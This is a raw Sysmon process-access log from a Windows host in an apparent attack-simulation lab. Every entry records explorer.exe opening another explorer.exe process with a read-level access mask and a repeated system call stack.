16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241647Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241646Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241645Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241644Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241643Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241642Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241641Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241640Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241639Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241638Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241637Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241636Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241635Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241634Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241633Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241632Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241631Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241630Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241629Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241628Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241627Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 